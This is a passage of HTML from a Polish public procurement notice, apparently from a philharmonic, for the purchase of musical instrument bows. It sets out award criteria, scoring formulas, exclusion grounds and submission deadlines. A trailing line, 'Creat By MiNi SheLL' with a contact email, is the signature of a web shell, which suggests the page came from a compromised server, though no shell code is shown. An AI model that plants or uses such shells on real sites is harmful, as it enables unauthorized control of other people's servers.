srebrna;<br/>Zasuwka: irys;<br/>Owijka: srebrna przeplatana z francuską nitką;<br/>Skórka: naturalna wytłaczana czarna lakierowana;<br/>Włosie naturalne;<br/>Waga: ok. 82 g </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 63000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37320000-7 - Części i akcesoria do instrumentów muzycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) ceny (C) – 60 %<br/>b) okresu gwarancji (G) – 40 %<br/> Zamawiający przyjmuje zasadę, że 1 % odpowiada 1 punktowi<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za oferowany okres gwarancji w miesiącach (G): <br/><br/> okres gwarancji w badanej ofercie (m-ce)<br/>G = ----------------------------------------------------------------------- x 100 pkt <br/> maksymalny oferowany okres gwarancji (m-ce)<br/><br/>Minimalny wymagany okres gwarancji wynosi 24 miesiące <br/>Maksymalny dopuszczalny okres gwarancji wynosi 48 miesięcy<br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: <br/>W = C x 60% + G x 40%<br/>gdzie: W - wynik ostateczny oceny oferty <br/>C - punkty za kryterium cena wyliczone zgodnie ze wzorem w pkt a)<br/>G - punkty za kryterium okres gwarancji wyliczone zgodnie ze wzorem w pkt b)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie, o którym mowa w art. 125 ust. 1 uPzp o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dla części 1), części 2), części 3) i części 4) zamówienia, Zamawiający wymaga dostarczenia certyfikatu lub oświadczenia Wykonawcy, że drewno było sezonowane. Przedmiotowe środki dowodowe Wykonawca może uzupełnić na żądanie Zamawiającego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Certyfikat lub oświadczenie Wykonawcy, że drewno było sezonowane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z art. 58 ust. 1 uPzp, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego. W tym przypadku Zamawiający wymaga załączenia do oferty oryginału lub uwierzytelnionej kopii pełnomocnictwa podpisanego przez wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia. Każdy z wykonawców wspólnie ubiegających się o udzielenie zmówienia składa oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 uPzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany treści umowy pod warunkiem, że ich wprowadzenie nie spowoduje konieczności zmiany treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz jest zgodne z art. 455 uPzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/filharmonia-slaska</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-09 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com